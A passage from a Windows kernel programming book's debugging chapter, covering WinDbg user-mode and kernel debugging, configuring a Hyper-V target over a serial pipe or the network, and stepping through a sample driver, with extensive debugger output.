Id: 874c.f0c4 Suspend: 1 Teb: 00000001`222d1000 Unfrozen
19
Id: 874c.17414 Suspend: 1 Teb: 00000001`222d3000 Unfrozen
20
Id: 874c.c878 Suspend: 1 Teb: 00000001`222d5000 Unfrozen
21
Id: 874c.d8c0 Suspend: 1 Teb: 00000001`222d7000 Unfrozen
. 22
Id: 874c.16a54 Suspend: 1 Teb: 00000001`222e1000 Unfrozen
23
Id: 874c.10838 Suspend: 1 Teb: 00000001`222db000 Unfrozen
24
Id: 874c.10cf0 Suspend: 1 Teb: 00000001`222dd000 Unfrozen
Lots of threads, right? These were created by the common open dialog, so not the direct fault of Notepad.
Continue exploring the debugger in any way you want!
Find out the system service numbers for NtWriteFile and NtReadFile.
If you close Notepad, you’ll hit a breakpoint at process termination:
Chapter 5: Debugging and Tracing
94
ntdll!NtTerminateProcess+0x14:
00007ffc`2047fc14 c3
ret
0:000> k
# Child-SP
RetAddr
Call Site
00 00000001`2247f6a8 00007ffc`20446dd8 ntdll!NtTerminateProcess+0x14
01 00000001`2247f6b0 00007ffc`1f64d62a ntdll!RtlExitUserProcess+0xb8
02 00000001`2247f6e0 00007ffc`061cee58 KERNEL32!ExitProcessImplementation+0xa
03 00000001`2247f710 00007ffc`0644719e mscoreei!RuntimeDesc::ShutdownAllActiveR\
untimes+0x287
04 00000001`2247fa00 00007ffc`1fcda291 mscoree!ShellShim_CorExitProcess+0x11e
05 00000001`2247fa30 00007ffc`1fcda2ad msvcrt!_crtCorExitProcess+0x4d
06 00000001`2247fa60 00007ffc`1fcda925 msvcrt!_crtExitProcess+0xd
07 00000001`2247fa90 00007ff7`5383ae1e msvcrt!doexit+0x171
08 00000001`2247fb00 00007ffc`1f647974 notepad!__mainCRTStartup+0x1b6
09 00000001`2247fbc0 00007ffc`2044a271 KERNEL32!BaseThreadInitThunk+0x14
0a 00000001`2247fbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
You can use the q command to quit the debugger. If the process is still alive, it will be terminated. An
alternative is to use the .detach command to disconnect from the target without killing it.
Kernel Debugging
User-mode debugging involves the debugger attaching to a process, setting breakpoints that cause the
process’ threads to become suspended, and so on. Kernel-mode debugging, on the other hand, involves
controlling the entire machine with the debugger. This means that if a breakpoint is set and then hit, the
entire machine is frozen. Clearly, this cannot be achieved with a single machine. In full kernel debugging,
two machines are involved: a host (where the debugger runs) and a target (being debugged). The target can,
however, be a virtual machine hosted on the same machine (host) where the debugger executes. Figure
5-5 shows a host and target connected via some connection medium.
Figure 5-5: Host-target connection
Before we get into full kernel debugging, we’ll take a look at its simpler cousin - local kernel debugging.
Local Kernel Debugging
Local kernel debugging (LKD) allows viewing system memory and other system information on the local
machine. The primary difference between local and full kernel debugging, is that with LKD there is no
Chapter 5: Debugging and Tracing
95
way to set up breakpoints, which means you’re always looking at the current state of the system. It also
means that things change, even while commands are being executed, so some information may be stale
or unreliable. With full kernel debugging, commands can only be entered while the target system is in a
breakpoint, so system state is unchanged.
To configure LKD, enter the following in an elevated command prompt and then restart the system:
bcdedit /debug on
Local Kernel Debugging is protected by Secure Boot on Windows 10, Server 2016, and later. To
activate LKD you’ll have to disable Secure Boot in the machine’s BIOS settings. If, for whatever
reason, this is not possible, there is an alternative using the Sysinternals LiveKd tool. Copy
LiveKd.exe to the Debugging Tools for Windows main directory. Then launch WinDbg using
LiveKd with the following command: livekd -w. The experience is not the same, as data may
become stale because of the way Livekd works, and you may need to exit the debugger and
relaunch from time to time.
After the system is restarted, launch WinDbg elevated (the 64-bit one, if you are on a 64-bit system). Select
the menu File / Attach To Kernel (WinDbg preview) or File / Kernel Debug… (classic WinDbg). Select the
Local tab and click OK. You should see output similar to the following:
Microsoft (R) Windows Debugger Version 10.0.22415.1003 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Connected to Windows 10 22000 x64 target at (Wed Sep 29 10:57:30.682 2021 (UTC \
+ 3:00)), ptr64 TRUE
************* Path validation summary **************
Response
Time (ms)
Location
Deferred
SRV*c:\symbols*https://msdl.micr\
osoft.com/download/symbols
Symbol search path is: SRV*c:\symbols*https://msdl.microsoft.com/download/symbo\
ls
Executable search path is:
Windows 10 Kernel Version 22000 MP (6 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff802`07a00000 PsLoadedModuleList = 0xfffff802`08629710
Debug session time: Wed Sep 29 10:57:30.867 2021 (UTC + 3:00)
System Uptime: 0 days 16:44:39.106
Note the prompt displays lkd. This indicates Local Kernel Debugging is active.
Chapter 5: Debugging and Tracing
96
Local kernel Debugging Tutorial
If you’re familiar with kernel debugging commands, you can safely skip this section.
You can display basic information for all processes running on the system with the process 0 0
command:
lkd> !process 0 0
**** NT ACTIVE PROCESS DUMP ****
PROCESS ffffd104936c8040
SessionId: none
Cid: 0004
Peb: 00000000
ParentCid: 0000
DirBase: 006d5000
ObjectTable: ffffa58d3cc44d00
HandleCount: 3909.
Image: System
PROCESS ffffd104936e2080
SessionId: none
Cid: 0058
Peb: 00000000
ParentCid: 0004
DirBase: 0182c000
ObjectTable: ffffa58d3cc4ea40
HandleCount:
0.
Image: Secure System
PROCESS ffffd1049370a080
SessionId: none
Cid: 0090
Peb: 00000000
ParentCid: 0004
DirBase: 011b6000
ObjectTable: ffffa58d3cc65a80
HandleCount:
0.
Image: Registry
PROCESS ffffd10497dd0080
SessionId: none
Cid: 024c
Peb: bc6c2ba000
ParentCid: 0004
DirBase: 10be4b000
ObjectTable: ffffa58d3d49ddc0
HandleCount:
60.
Image: smss.exe
...
For each process, the following information is displayed:
• The address attached to the PROCESS text is the EPROCESS address of the process (in kernel space,
of course).
• SessionId - the session the process is running under.
• Cid - (client ID) the unique process ID.
• Peb - the address of the Process Environment Block (PEB). This address is in user space, naturally.
• ParentCid - (parent client ID) the process ID of the parent process. Note that it’s possible the parent
process no longer exists, so this ID may belong to some process created after the parent process
terminated.
• DirBase - physical address of the Master Page Directory for this process, used as the basis for virtual
to physical address translation. On x64, this is known as Page Map Level 4, and on x86 it’s Page
Directory Pointer Table (PDPT).
• ObjectTable - pointer to the private handle table for the process.
Chapter 5: Debugging and Tracing
97
• HandleCount - number of handles in the handle table for this process.
• Image - executable name, or special process name for those not associated with an executable (such
as Secure System, System, Mem Compression).
The !process command accepts at least two arguments. The first indicates the process of interest using its
EPROCESS address or the unique Process ID, where zero means “all or any process”. The second argument
is the level of detail to display (a bit mask), where zero means the least amount of detail. A third argument
can be added to search for a particular executable. Here are a few examples:
List all processes running explorer.exe:
lkd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
SessionId: 1
Cid: 1780
Peb: 0076b000
ParentCid: 16d0
DirBase: 362ea5000
ObjectTable: ffffa58d45891680
HandleCount: 3208.
Image: explorer.exe
PROCESS ffffd104a14e2080
SessionId: 1
Cid: 2548
Peb: 005c1000
ParentCid: 0314
DirBase: 140fe9000
ObjectTable: ffffa58d46a99500
HandleCount: 2613.
Image: explorer.exe
List more information for a specific process by specifying its address and a higher level of detail:
lkd> !process ffffd1049e7a60c0 1
PROCESS ffffd1049e7a60c0
SessionId: 1
Cid: 1374
Peb: d3e343000
ParentCid: 0314
DirBase: 37eb97000
ObjectTable: ffffa58d58a9de00
HandleCount: 224.
Image: dllhost.exe
VadRoot ffffd104b81c7db0 Vads 94 Clone 0 Private 455. Modified 2. Locked 0.
DeviceMap ffffa58d41354230
Token
ffffa58d466e0060
ElapsedTime
01:04:36.652
UserTime
00:00:00.015
KernelTime
00:00:00.015
QuotaPoolUsage[PagedPool]
201696
QuotaPoolUsage[NonPagedPool]
13048
Working Set Sizes (now,min,max)
(4330, 50, 345) (17320KB, 200KB, 1380KB)
PeakWorkingSetSize
4581
VirtualSize
2101383 Mb
PeakVirtualSize
2101392 Mb
PageFaultCount
5427
MemoryPriority
BACKGROUND
BasePriority
8
Chapter 5: Debugging and Tracing
98
CommitCharge
678
Job
ffffd104a05ed380
As can be seen from the above output, more information on the process is displayed. Some of this
information is hyperlinked, allowing easy further examination. For example, the job this process is part of
(if any) is a hyperlink, executing the !job command if clicked.
Click on the Job address hyperlink:
lkd> !job ffffd104a05ed380
Job at ffffd104a05ed380
Basic Accounting Information
TotalUserTime:
0x0
TotalKernelTime:
0x0
TotalCycleTime:
0x0
ThisPeriodTotalUserTime:
0x0
ThisPeriodTotalKernelTime: 0x0
TotalPageFaultCount:
0x0
TotalProcesses:
0x1
ActiveProcesses:
0x1
FreezeCount:
0
BackgroundCount:
0
TotalTerminatedProcesses:
0x0
PeakJobMemoryUsed:
0x2f5
PeakProcessMemoryUsed:
0x2f5
Job Flags
[wake notification allocated]
[wake notification enabled]
[timers virtualized]
Limit Information (LimitFlags: 0x800)
Limit Information (EffectiveLimitFlags: 0x403800)
JOB_OBJECT_LIMIT_BREAKAWAY_OK
A Job is a kernel object that manages one or more processes, for which it can apply various
limits and get accounting information. A discussion of jobs is beyond the scope of this book.
More information can be found in the Windows Internals 7th edition part 1 and Windows 10
System Programming, Part 1 books.
As usual, a command such as !job hides some information available in the real data structure. In this
case, the typoe is EJOB. Use the command dt nt!_ejob with the job address to see all the details.
The PEB of a process can be viewed as well by clicking its hyperlink. This is similar to the !peb command
used in user mode, but the twist here is that the correct process context must be set first, as the address is
in user space. Click the Peb hyperlink. You should see something like this:
Chapter 5: Debugging and Tracing
99
lkd> .process /p ffffd1049e7a60c0; !peb d3e343000
Implicit process is now ffffd104`9e7a60c0
PEB at 0000000d3e343000
InheritedAddressSpace:
No
ReadImageFileExecOptions: No
BeingDebugged:
No
ImageBaseAddress:
00007ff661180000
NtGlobalFlag:
0
NtGlobalFlag2:
0
Ldr
00007ffb37ef9120
Ldr.Initialized:
Yes
Ldr.InInitializationOrderModuleList: 000001d950004560 . 000001d95005a960
Ldr.InLoadOrderModuleList:
000001d9500046f0 . 000001d95005a940
Ldr.InMemoryOrderModuleList:
000001d950004700 . 000001d95005a950
Base TimeStamp
Module
7ff661180000 93f44fbf Aug 29 00:12:31 2048 C:\WINDOWS\system32\DllH\
ost.exe
7ffb37d80000 50702a8c Oct 06 15:56:44 2012 C:\WINDOWS\SYSTEM32\ntdl\
l.dll
7ffb36790000 ae0b35b0 Jul 13 01:50:24 2062 C:\WINDOWS\System32\KERN\
EL32.DLL
...
The correct process context is set with the .process meta command, and then the PEB is displayed.
This is a general technique you need to use to show memory that is in user space - always make sure the
debugger is set to the correct process context.
Execute the !process command again, but with the second bit set for the details:
lkd> !process ffffd1049e7a60c0 2
PROCESS ffffd1049e7a60c0
SessionId: 1
Cid: 1374
Peb: d3e343000
ParentCid: 0314
DirBase: 37eb97000
ObjectTable: ffffa58d58a9de00
HandleCount: 221.
Image: dllhost.exe
THREAD ffffd104a02de080
Cid 1374.022c
Teb: 0000000d3e344000 Win32Thread: \
ffffd104b82ccbb0 WAIT: (UserRequest) UserMode Non-Alertable
ffffd104b71d2860
SynchronizationEvent
THREAD ffffd104a45e8080
Cid 1374.0f04
Teb: 0000000d3e352000 Win32Thread: \
ffffd104b82ccd90 WAIT: (WrUserRequest) UserMode Non-Alertable
ffffd104adc5e0c0
QueueObject
THREAD ffffd104a229a080
Cid 1374.1ed8
Teb: 0000000d3e358000 Win32Thread: \
Chapter 5: Debugging and Tracing
100
ffffd104b82cf900 WAIT: (UserRequest) UserMode Non-Alertable
ffffd104b71dfb60
NotificationEvent
ffffd104ad02a740
QueueObject
THREAD ffffd104b78ee040
Cid 1374.0330
Teb: 0000000d3e37a000 Win32Thread: \
0000000000000000 WAIT: (WrQueue) UserMode Alertable
ffffd104adc4f640
QueueObject
Detail level 2 shows a summary of the threads in the process along with the object(s) they are waiting on
(if any).
You can use other detail values (4, 8), or combine them, such as 3 (1 or 2).
Repeat the !process command again, but this time with no detail level. More information is shown for
the process (the default in this case is full details):
lkd> !process ffffd1049e7a60c0
PROCESS ffffd1049e7a60c0
SessionId: 1
Cid: 1374
Peb: d3e343000
ParentCid: 0314
DirBase: 37eb97000
ObjectTable: ffffa58d58a9de00
HandleCount: 223.
Image: dllhost.exe
VadRoot ffffd104b81c7db0 Vads 94 Clone 0 Private 452. Modified 2. Locked 0.
DeviceMap ffffa58d41354230
Token
ffffa58d466e0060
ElapsedTime
01:10:30.521
UserTime
00:00:00.015
KernelTime
00:00:00.015
QuotaPoolUsage[PagedPool]
201696
QuotaPoolUsage[NonPagedPool]
13048
Working Set Sizes (now,min,max)
(4329, 50, 345) (17316KB, 200KB, 1380KB)
PeakWorkingSetSize
4581
VirtualSize
2101383 Mb
PeakVirtualSize
2101392 Mb
PageFaultCount
5442
MemoryPriority
BACKGROUND
BasePriority
8
CommitCharge
678
Job
ffffd104a05ed380
THREAD ffffd104a02de080
Cid 1374.022c
Teb: 0000000d3e344000 Win32Thread: \
ffffd104b82ccbb0 WAIT: (UserRequest) UserMode Non-Alertable
ffffd104b71d2860
SynchronizationEvent
Not impersonating
DeviceMap
ffffa58d41354230
Chapter 5: Debugging and Tracing
101
Owning Process
ffffd1049e7a60c0
Image:
dllhost.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3641927
Ticks: 270880 (0:01:10:32.500)
Context Switch Count
27
IdealProcessor: 2
UserTime
00:00:00.000
KernelTime
00:00:00.000
Win32 Start Address 0x00007ff661181310
Stack Init ffffbe88b4bdf630 Current ffffbe88b4bdf010
Base ffffbe88b4be0000 Limit ffffbe88b4bd9000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Kernel stack not resident.
THREAD ffffd104a45e8080
Cid 1374.0f04
Teb: 0000000d3e352000 Win32Thread: \
ffffd104b82ccd90 WAIT: (WrUserRequest) UserMode Non-Alertable
ffffd104adc5e0c0
QueueObject
Not impersonating
DeviceMap
ffffa58d41354230
Owning Process
ffffd1049e7a60c0
Image:
dllhost.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3910734
Ticks: 2211 (0:00:00:34.546)
Context Switch Count
2684
IdealProcessor: 4
UserTime
00:00:00.046
KernelTime
00:00:00.078
Win32 Start Address 0x00007ffb3630f230
Stack Init ffffbe88b4c87630 Current ffffbe88b4c86a10
Base ffffbe88b4c88000 Limit ffffbe88b4c81000 Call 0000000000000000
Priority 10 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP
RetAddr
Call Site
ffffbe88`b4c86a50 fffff802`07c5dc17
nt!KiSwapContext+0x76
ffffbe88`b4c86b90 fffff802`07c5fac9
nt!KiSwapThread+0x3a7
ffffbe88`b4c86c70 fffff802`07c59d24
nt!KiCommitThreadWait+0x159
ffffbe88`b4c86d10 fffff802`07c8ac70
nt!KeWaitForSingleObject+0x234
ffffbe88`b4c86e00 fffff9da`6d577d46
nt!KeWaitForMultipleObjects+0x540
ffffbe88`b4c86f00 fffff99c`c175d920
0xfffff9da`6d577d46
ffffbe88`b4c86f08 fffff99c`c175d920
0xfffff99c`c175d920
ffffbe88`b4c86f10 00000000`00000001
0xfffff99c`c175d920
ffffbe88`b4c86f18 ffffd104`9a423df0
0x1
ffffbe88`b4c86f20 00000000`00000001
0xffffd104`9a423df0
ffffbe88`b4c86f28 ffffbe88`b4c87100
0x1
ffffbe88`b4c86f30 00000000`00000000
0xffffbe88`b4c87100
...
The command lists all threads within the process. Each thread is represented by its ETHREAD address
attached to the text “THREAD”. The call stack is listed as well - the module prefix “nt” represents the
Chapter 5: Debugging and Tracing
102
kernel - there is no need to use the real kernel module name.
One of the reasons to use “nt” instead of explicitly stating the kernel’s module name is because these are
different between 64 and 32 bit systems (ntoskrnl.exe on 64 bit, and mtkrnlpa.exe on 32 bit); and it’s a
lot shorter.
User-mode symbols are not loaded by default, so thread stacks that span to user mode show just numeric
addresses. You can load user symbols explicitly with .reload /user after setting the process context to
the process of interest with the .process command:
lkd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
SessionId: 1
Cid: 1780
Peb: 0076b000
ParentCid: 16d0
DirBase: 362ea5000
ObjectTable: ffffa58d45891680
HandleCount: 3217.
Image: explorer.exe
PROCESS ffffd104a14e2080
SessionId: 1
Cid: 2548
Peb: 005c1000
ParentCid: 0314
DirBase: 140fe9000
ObjectTable: ffffa58d46a99500
HandleCount: 2633.
Image: explorer.exe
lkd> .process /p ffffd1049e118080
Implicit process is now ffffd104`9e118080
lkd> .reload /user
Loading User Symbols
................................................................
lkd> !process ffffd1049e118080
PROCESS ffffd1049e118080
SessionId: 1
Cid: 1780
Peb: 0076b000
ParentCid: 16d0
DirBase: 362ea5000
ObjectTable: ffffa58d45891680
HandleCount: 3223.
Image: explorer.exe
...
THREAD ffffd1049e47c400
Cid 1780.1754
Teb: 000000000078c000 Win32Thread: \
ffffd1049e5da7a0 WAIT: (WrQueue) UserMode Alertable
ffffd1049e076480
QueueObject
IRP List:
ffffd1049fbea9b0: (0006,0478) Flags: 00060000
Mdl: 00000000
ffffd1049efd6aa0: (0006,0478) Flags: 00060000
Mdl: 00000000
ffffd1049efee010: (0006,0478) Flags: 00060000
Mdl: 00000000
ffffd1049f3ef8a0: (0006,0478) Flags: 00060000
Mdl: 00000000
Not impersonating
Chapter 5: Debugging and Tracing
103
DeviceMap
ffffa58d41354230
Owning Process
ffffd1049e118080
Image:
explorer.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3921033
Ticks: 7089 (0:00:01:50.765)
Context Switch Count
16410
IdealProcessor: 5
UserTime
00:00:00.265
KernelTime
00:00:00.234
Win32 Start Address ntdll!TppWorkerThread (0x00007ffb37d96830)
Stack Init ffffbe88b5fc7630 Current ffffbe88b5fc6d20
Base ffffbe88b5fc8000 Limit ffffbe88b5fc1000 Call 0000000000000000
Priority 9 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP
RetAddr
Call Site
ffffbe88`b5fc6d60 fffff802`07c5dc17
nt!KiSwapContext+0x76
ffffbe88`b5fc6ea0 fffff802`07c5fac9
nt!KiSwapThread+0x3a7
ffffbe88`b5fc6f80 fffff802`07c62526
nt!KiCommitThreadWait+0x159
ffffbe88`b5fc7020 fffff802`07c61f38
nt!KeRemoveQueueEx+0x2b6
ffffbe88`b5fc70d0 fffff802`07c6479c
nt!IoRemoveIoCompletion+0x98
ffffbe88`b5fc71f0 fffff802`07e25075
nt!NtWaitForWorkViaWorkerFactory+0x\
39c
ffffbe88`b5fc7430 00007ffb`37e26e84
nt!KiSystemServiceCopyEnd+0x25 (Tra\
pFrame @ ffffbe88`b5fc74a0)
00000000`03def858 00007ffb`37d96b0f
ntdll!NtWaitForWorkViaWorkerFactory\
+0x14
00000000`03def860 00007ffb`367a54e0
ntdll!TppWorkerThread+0x2df
00000000`03defb50 00007ffb`37d8485b
KERNEL32!BaseThreadInitThunk+0x10
00000000`03defb80 00000000`00000000
ntdll!RtlUserThreadStart+0x2b
...
Notice the thread above has issued several IRPs as well. We’ll discuss this in greater detail in chapter 7.
A thread’s information can be viewed separately with the !thread command and the address of the
thread. Check the debugger documentation for the description of the various pieces of information
displayed by this command.
Other generally useful/interesting commands in kernel-mode debugging include:
• !pcr - display the Process Control Region (PCR) for a processor specified as an additional index
(processor 0 is displayed by default if no index is specified).
• !vm - display memory statistics for the system and processes.
• !running - displays information on threads running on all processors on the system.
We’ll look at more specific commands useful for debugging drivers in subsequent chapters.
Chapter 5: Debugging and Tracing
104
Full Kernel Debugging
Full kernel debugging requires configuration on the host and target. In this section, we’ll see how to
configure a virtual machine as a target for kernel debugging. This is the recommended and most convenient
setup for kernel driver work (when not developing device drivers for hardware). We’ll go through the
steps for configuring a Hyper-V virtual machine. If you’re using a different virtualization technology (e.g.
VMWare or VirtualBox), please consult that product’s documentation or the web for the correct procedure
to get the same results.
The target and host machineד must communicate using some communication media. There are several
options available. The fastest communication option is to use the network. Unfortunately, this requires the
host and target to run Windows 8 at a minimum. Since Windows 7 is still a viable target, there is another
convenient option - the COM (serial) port, which can be exposed as a named pipe to the host machine. All
virtualization platforms allow redirecting a virtual serial port to a named pipe on the host. We’ll look at
both options.
Just like Local Kernel Debugging, the target machine cannot use Secure Boot. With full kernel
debugging, there is no workaround.
Using a Virtual Serial Port
In this section, we’ll configure the target and host to use a virtual COM port exposed as a named pipe to
the host. In the next section, we’ll configure kernel debugging using the network.
Configuring the Target
The target VM must be configured for kernel debugging, similar to local kernel debugging, but with the
added connection media set to a virtual serial port on that machine.
One way to do the configuration is using bcdedit in an elevated command window:
bcdedit /debug on
bcdedit /dbgsettings serial debugport:1 baudrate:115200
Change the debug port number according to the actual virtual serial number (typically 1).
The VM must be restarted for these configurations to take effect. Before you do that, we can map the serial
port to a named pipe. Here is the procedure for Hyper-V virtual machines:
If the Hyper-V VM is Generation 1 (older), there is a simple UI in the VM’s settings to do the configuration.
Use the Add Hardware option to add a serial port if there are none defined. Then configure the serial port
to be mapped to a named port of your choosing. Figure 5-6 shows this dialog.
Chapter 5: Debugging and Tracing
105
Figure 5-6: Mapping serial port to named pipe for Hyper-V Gen-1 VM
For Generation 2 VMs, no UI is currently available. To configure this, make sure the VM is shut down, and
open an elevated PowerShell window.
Type the following to set a serial port mapped to a named pipe:
PS C:\>Set-VMComPort myvmname -Number 1 -Path "\\.\pipe\debug"
Change the VM name appropriately and the COM port number as set inside the VM earlier with bcdedit.
Make sure the pipe path is unique.
You can verify the settings are as expected with Get-VMComPort:
Chapter 5: Debugging and Tracing
106
PS C:\>Get-VMComPort myvmname
VMName
Name
Path
------
----
----
myvmname COM 1 \\.\pipe\debug
myvmname COM 2
You can boot the VM - the target is now ready.
Configuring the Host
The kernel debugger must be properly configured to connect with the VM on the same serial port mapped
to the same named pipe exposed on the host.
Launch the kernel debugger elevated, and select File / Attach To Kernel. Navigate to the COM tab. Fill in
the correct details as they were set on the target. Figure 5-7 shows what these settings look like.
Figure 5-7: Setting host COM port configuration
Click OK. The debugger should attach to the target. If it does not, click the Break toolbar button. Here is
some typical output:
Chapter 5: Debugging and Tracing
107
Microsoft (R) Windows Debugger Version 10.0.18317.1001 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
Opened \\.\pipe\debug
Waiting to reconnect...
Connected to Windows 10 18362 x64 target at (Sun Apr 21 11:28:11.300 2019 (UTC \
+ 3:00)), ptr64 TRUE
Kernel Debugger connection established.
(Initial Breakpoint requested)
************* Path validation summary **************
Response
Time (ms)
Location
Deferred
SRV*c:\Symbols*http://msdl.micro\
soft.com/download/symbols
Symbol search path is: SRV*c:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows 10 Kernel Version 18362 MP (4 procs) Free x64
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 18362.1.amd64fre.19h1_release.190318-1202
Machine Name:
Kernel base = 0xfffff801`36a09000 PsLoadedModuleList = 0xfffff801`36e4c2d0
Debug session time: Sun Apr 21 11:28:09.669 2019 (UTC + 3:00)
System Uptime: 1 days 0:12:28.864
Break instruction exception - code 80000003 (first chance)
*******************************************************************************
*
*
*
You are seeing this message because you pressed either
*
*
CTRL+C (if you run console kernel debugger) or,
*
*
CTRL+BREAK (if you run GUI kernel debugger),
*
*
on your debugger machine's keyboard.
*
*
*
*
THIS IS NOT A BUG OR A SYSTEM CRASH
*
*
*
* If you did not intend to break into the debugger, press the "g" key, then
*
* press the "Enter" key now.
This message might immediately reappear.
If it *
* does, press "g" and "Enter" again.
*
*
*
*******************************************************************************
nt!DbgBreakPointWithStatus:
fffff801`36bcd580 cc
int
3
Note the prompt has an index and the word kd. The index is the current processor that induced the break.
At this point, the target VM is completely frozen. You can now debug normally, bearing in mind anytime
you break somewhere, the entire machine is frozen.
Chapter 5: Debugging and Tracing
108
Using the Network
In this section, we’ll configure full kernel debugging using the network, focusing on the differences
compared to the virtual COM port setup.
Configuring the Target
On the target machine, running with an elevated command window, configure network debugging using
the following format with bcdedit:
bcdedit /dbgsettings net hostip:<ip> port: <port> [key: <key>]
The hostip must be the IP address of the host accessible from the target. port can be any available port on
the host, but the documentation recommends working with port 50000 and up. The key is optional. If you
don’t specify it, the command generates a random key. For example:
c:/>bcdedit /dbgsettings net hostip:10.100.102.53 port:51111
Key=1rhvit77hdpv7.rxgwjdvhxj7v.312gs2roip4sf.3w25wrjeocobh
The alternative is provide your own key for simplicity, which must be in the format a.b.c.d. This is
acceptable from a security standpoint when working with local virtual machines:
c:/>bcdedit /dbgsettings net hostip:10.100.102.53 port:51111 key:1.2.3.4
Key=1.2.3.4
You can always display the current debug configuration with /dbgsettings alone:
c:\>bcdedit /dbgsettings
key
1.2.3.4
debugtype
NET
hostip
10.100.102.53
port
51111
dhcp
Yes
The operation completed successfully.
Finally, restart the target.
Configuring the Host
On the host machine, launch the debugger and select the File / Attach the Kernel option (or File / Kernel
Debug… in the classic WinDbg). Navigate to the NET tab, and enter the information corresponding to your
settings (figure 5-7).
Chapter 5: Debugging and Tracing
109
Figure 5-8: Attach to kernel dialog
You may need to click the Break button (possibly multiple times) to establish a connection. More in-
formation and troubeshooting tips can be found at https://docs.microsoft.com/en-us/windows-hardware/
drivers/debugger/setting-up-a-network-debugging-connection.
Kernel Driver Debugging Tutorial
Once host and target are connected, debugging can begin. We will use the Booster driver we developed in
chapter 4 to demonstrate full kernel debugging.
Install (but don’t load) the driver on the target as was done in chapter 4. Make sure you copy the driver’s
PDB file alongside the driver SYS file itself. This simplifies getting correct symbols for the driver.
Let’s set a breakpoint in DriverEntry. We cannot load the driver just yet because that would cause
DriverEntry to execute, and we’ll miss the chance to set a breakpoint there. Since the driver is not
loaded yet, we can use the bu command (unresolved breakpoint) to set a future breakpoint. Break into the
target if it’s currently running, and type the following command in the debugger:
0: kd> bu booster!driverentry
0: kd> bl
0 e Disable Clear u
0001 (0001) (booster!driverentry)
The breakpoint is unresolved at this point, since our module (driver) is not yet loaded. The debugger will
re-evaluate the breakpoint any time a new module is loaded.
Issue the g command to let the target continue execution, and load the driver with sc start booster
(assuming the driver’s name is booster). If all goes well, the breakpoint should hit, and the source file
should open automatically, showing the following output in the command window:
Chapter 5: Debugging and Tracing
110
0: kd> g
Breakpoint 0 hit
Booster!DriverEntry:
fffff802`13da11c0 4889542410
mov
qword ptr [rsp+10h],rdx
The index on the left of the colon is the CPU index running the code when the breakpoint hit
(CPU 0 in the above output).
Figure 5-9 shows a screenshot of WinDbg Preview source window automatically opening and the correct
line marked. The Locals window is also shown as expected.
Chapter 5: Debugging and Tracing
111
Figure 5-9: Breakpoint hit in DriverEntry
Chapter 5: Debugging and Tracing
112
At this point, you can step over source lines, look at variables in the Locals window, and even add
expressions to the Watch window. You can also change values using the Locals window just like you
would normally do with other debuggers.
The Command window is still available as always, but some operations are just easier with the GUI. Setting
breakpoints, for example, can be done with the normal bp command, but you can simply open a source
file (if it’s not already open), go to the line where you want to set a breakpoint, and hit F9 or click the
appropriate button on the toolbar. Either way, the bp command will be executed in the Command window.
The Breakpoints window can serve as a quick overview of the currently set breakpoints.
• Issue the k command to see how DriverEntry is being invoked:
0: kd> k
# Child-SP
RetAddr
Call Site
00 ffffbe88`b3f4f138 fffff802`13da5020
Booster!DriverEntry [D:\Dev\windowsk\
ernelprogrammingbook2e\Chapter04\Booster\Booster.cpp @ 9]
01 ffffbe88`b3f4f140 fffff802`081cafc0
Booster!GsDriverEntry+0x20 [minkerne\
l\tools\gs_support\kmode\gs_support.c @ 128]
02 ffffbe88`b3f4f170 fffff802`080858e2
nt!PnpCallDriverEntry+0x4c
03 ffffbe88`b3f4f1d0 fffff802`081aeab7
nt!IopLoadDriver+0x8ba
04 ffffbe88`b3f4f380 fffff802`07c48aaf
nt!IopLoadUnloadDriver+0x57
05 ffffbe88`b3f4f3c0 fffff802`07d5b615
nt!ExpWorkerThread+0x14f
06 ffffbe88`b3f4f5b0 fffff802`07e16c24
nt!PspSystemThreadStartup+0x55
07 ffffbe88`b3f4f600 00000000`00000000
nt!KiStartSystemThread+0x34
If breakpoints fail to hit, it may be a symbols issue. Execute the .reload command and see
if the issues are resolved. Setting breakpoints in user space is also possible, but first execute
.reload /user to force the debugger to load user-mode symbols.
It may be the case that a breakpoint should hit only when a specific process is the one executing the code.
This can be done by adding the /p switch to a breakpoint. In the following example, a breakpoint is set
only if the process is a specific explorer.exe:
0: kd> !process 0 0 explorer.exe
PROCESS ffffd1049e118080
SessionId: 1
Cid: 1780
Peb: 0076b000
ParentCid: 16d0
DirBase: 362ea5000
ObjectTable: ffffa58d45891680
HandleCount: 3918.
Image: explorer.exe
PROCESS ffffd104a14e2080
SessionId: 1
Cid: 2548
Peb: 005c1000
ParentCid: 0314
DirBase: 140fe9000
ObjectTable: ffffa58d46a99500
HandleCount: 4524.
Chapter 5: Debugging and Tracing
113
Image: explorer.exe
0: kd> bp /p ffffd1049e118080 booster!boosterwrite
0: kd> bl
0 e Disable Clear
fffff802`13da11c0
[D:\Dev\Chapter04\Booster\Booster.cp\
p @ 9]
0001 (0001) Booster!DriverEntry
1 e Disable Clear
fffff802`13da1090
[D:\Dev\Chapter04\Booster\Booster.cp\
p @ 61]
0001 (0001) Booster!BoosterWrite
Match process data ffffd104`9e118080
Let’s set a normal breakpoint somewhere in the BoosterWrite function, by hitting F9 on the line in
source view, as shown in figure 5-10 (the earlier conditional breakpoint is shown as well).
Figure 5-10: Breakpoint hit in DriverEntry
Listing the breakpoints reflect the new breakpoint with the offset calculated by the debugger:
Chapter 5: Debugging and Tracing
114
0: kd> bl
0 e Disable Clear
fffff802`13da11c0
[D:\Dev\Chapter04\Booster\Booster.cpp @\
9]
0001 (0001) Booster!DriverEntry
1 e Disable Clear
fffff802`13da1090
[D:\Dev\Chapter04\Booster\Booster.cpp @\
61] 0001 (0001) Booster!BoosterWrite
Match process data ffffd104`9e118080
2 e Disable Clear
